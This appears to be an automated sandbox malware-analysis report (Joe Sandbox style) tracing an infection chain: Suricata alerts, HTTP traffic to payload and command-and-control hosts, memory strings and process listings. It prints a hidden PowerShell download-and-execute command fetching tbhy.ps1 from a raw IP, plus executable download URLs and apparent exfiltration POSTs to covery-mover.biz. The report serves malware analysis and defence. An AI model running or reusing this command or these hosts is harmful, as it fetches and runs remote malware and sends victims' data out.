00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: GET /infopage/bhg8.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /infopage/ung0.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
              Source: Joe Sandbox ViewIP Address: 147.45.44.131 147.45.44.131
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: RACKMARKTES RACKMARKTES
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49734 -> 147.45.44.131:80
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 172.67.206.64:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: covery-mover.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: covery-mover.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YPG1TIB3SUIY02Y203YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18169Host: covery-mover.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G2LZBTFA26935YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8760Host: covery-mover.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Z4TTJ1VUF4OCQR1DRE5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20443Host: covery-mover.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=442XREIEZD5LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1233Host: covery-mover.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=T3IXJXPW7E9RKTS2P7EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 583787Host: covery-mover.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: covery-mover.biz
              Source: global trafficHTTP traffic detected: GET /tbhy.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 45.131.135.227Connection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 45.131.135.227
              Source: unknownTCP traffic detected without corresponding DNS query: 45.131.135.227
              Source: unknownTCP traffic detected without corresponding DNS query: 45.131.135.227
              Source: unknownTCP traffic detected without corresponding DNS query: 45.131.135.227
              Source: unknownTCP traffic detected without corresponding DNS query: 45.131.135.227
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 45.131.135.227
              Source: unknownTCP traffic detected without corresponding DNS query: 45.131.135.227
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
              Source: global trafficHTTP traffic detected: GET /tbhy.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 45.131.135.227Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /infopage/bhg8.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /infopage/ung0.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
              Source: global trafficDNS traffic detected: DNS query: zinc-sneark.biz
              Source: global trafficDNS traffic detected: DNS query: se-blurry.biz
              Source: global trafficDNS traffic detected: DNS query: dwell-exclaim.biz
              Source: global trafficDNS traffic detected: DNS query: formy-spill.biz
              Source: global trafficDNS traffic detected: DNS query: covery-mover.biz
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: covery-mover.biz
              Source: powershell.exe, 00000001.00000002.1781632412.000000000546C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781632412.00000000055E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131
              Source: powershell.exe, 00000001.00000002.1781632412.0000000005BFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/bhg8.exe
              Source: powershell.exe, 00000001.00000002.1781632412.00000000055E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/ung0.exe
              Source: mshta.exe, 00000000.00000003.1679927373.000000000082A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1680851940.000000000082A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1677082981.0000000000829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1676018400.000000000081E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781632412.0000000005236000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781632412.0000000005A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.131.135.227
              Source: powershell.exe, 00000001.00000002.1791197729.0000000007550000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781632412.0000000005A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.131.135.227/tbhy.ps1
              Source: powershell.exe, 00000001.00000002.1781632412.0000000005A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.131.138
              Source: svchost.exe, 00000003.00000002.2911202163.0000027EE4A11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: svchost.exe, 00000003.00000003.1674729958.0000027EE4C38000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
              Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: svchost.exe, 00000003.00000003.1674729958.0000027EE4C38000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: svchost.exe, 00000003.00000003.1674729958.0000027EE4C38000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: svchost.exe, 00000003.00000003.1674729958.0000027EE4C6D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: edb.log.3.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: powershell.exe, 00000001.00000002.1789783027.000000000614A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000001.00000002.1781632412.0000000005236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.1781632412.00000000050E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000001.00000002.1781632412.0000000005236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000002.1781632412.00000000050E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBdq
              Source: powershell.exe, 00000001.00000002.1789783027.000000000614A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000001.00000002.1789783027.000000000614A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000001.00000002.1789783027.000000000614A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: RegAsm.exe, 00000007.00000002.1983377456.0000000000E0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covery-mover.biz/
              Source: RegAsm.exe, 00000007.00000002.1983377456.0000000000E23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covery-mover.biz/D
              Source: RegAsm.exe, 00000007.00000002.1983377456.0000000000E23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covery-mover.biz/api
              Source: RegAsm.exe, 00000007.00000002.1983377456.0000000000E0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covery-mover.biz/apia
              Source: RegAsm.exe, 00000007.00000002.1983377456.0000000000E23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covery-mover.biz/apid
              Source: RegAsm.exe, 00000007.00000002.1983377456.0000000000E23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covery-mover.biz/apie.
              Source: RegAsm.exe, 00000007.00000002.1983377456.0000000000DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covery-mover.biz:443/api
              Source: svchost.exe, 00000003.00000003.1674729958.0000027EE4CE2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
              Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
              Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
              Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: svchost.exe, 00000003.00000003.1674729958.0000027EE4CE2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
              Source: powershell.exe, 00000001.00000002.1781632412.0000000005236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.1781632412.00000000058BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000001.00000002.1789783027.000000000614A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: svchost.exe, 00000003.00000003.1674729958.0000027EE4CE2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
              Source: edb.log.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00431A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_00431A30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00431A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_00431A30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00431BB0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,7_2_00431BB0

              System Summary

              barindex
              Detected Cobalt Strike Beacon
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex"Jump to behavior
              Malicious sample detected (through community Yara rule)
              Source: Process Memory Space: powershell.exe PID: 3616, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              .NET source code contains very large strings
              Source: 1.2.powershell.exe.55e2b80.2.raw.unpack, Sap.csLong String: Length: 18812
              Source: 1.2.powershell.exe.55cc700.1.raw.unpack, Sap.csLong String: Length: 18812
              Source: 1.2.powershell.exe.77d0000.4.raw.unpack, Sap.csLong String: Length: 18812
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04EE7CC01_2_04EE7CC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040A9607_2_0040A960
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004261707_2_00426170
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040E2A97_2_0040E2A9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00416B7E7_2_00416B7E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00439B907_2_00439B90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004233A07_2_004233A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00436C407_2_00436C40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043DCF07_2_0043DCF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004215F07_2_004215F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042C6D77_2_0042C6D7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043E6907_2_0043E690
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042BFD37_2_0042BFD3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00410FD67_2_00410FD6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042BFDA7_2_0042BFDA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004087F07_2_004087F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00436F907_2_00436F90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004097B07_2_004097B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00425F7D7_2_00425F7D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004090707_2_00409070
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043A0307_2_0043A030
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004038C07_2_004038C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004380D97_2_004380D9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041D8E07_2_0041D8E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042D0857_2_0042D085
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004280B07_2_004280B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042297F7_2_0042297F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042A1007_2_0042A100
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004379007_2_00437900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00416E977_2_00416E97
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004059107_2_00405910
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004259207_2_00425920
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004301D07_2_004301D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004081F07_2_004081F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004089907_2_00408990
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004171907_2_00417190
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00414A407_2_00414A40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041BA487_2_0041BA48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040CA547_2_0040CA54
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004042707_2_00404270
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004222707_2_00422270
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004062007_2_00406200
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00423A007_2_00423A00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043CAC07_2_0043CAC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043E2C07_2_0043E2C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004292D07_2_004292D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00415ADC7_2_00415ADC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042BA8D7_2_0042BA8D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004192BA7_2_004192BA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040B3517_2_0040B351
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041CB5A7_2_0041CB5A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004093607_2_00409360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041C3607_2_0041C360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00411B1B7_2_00411B1B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043533A7_2_0043533A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043CBD67_2_0043CBD6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043A3F07_2_0043A3F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00404BA07_2_00404BA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040D44C7_2_0040D44C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00434C4D7_2_00434C4D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004074707_2_00407470
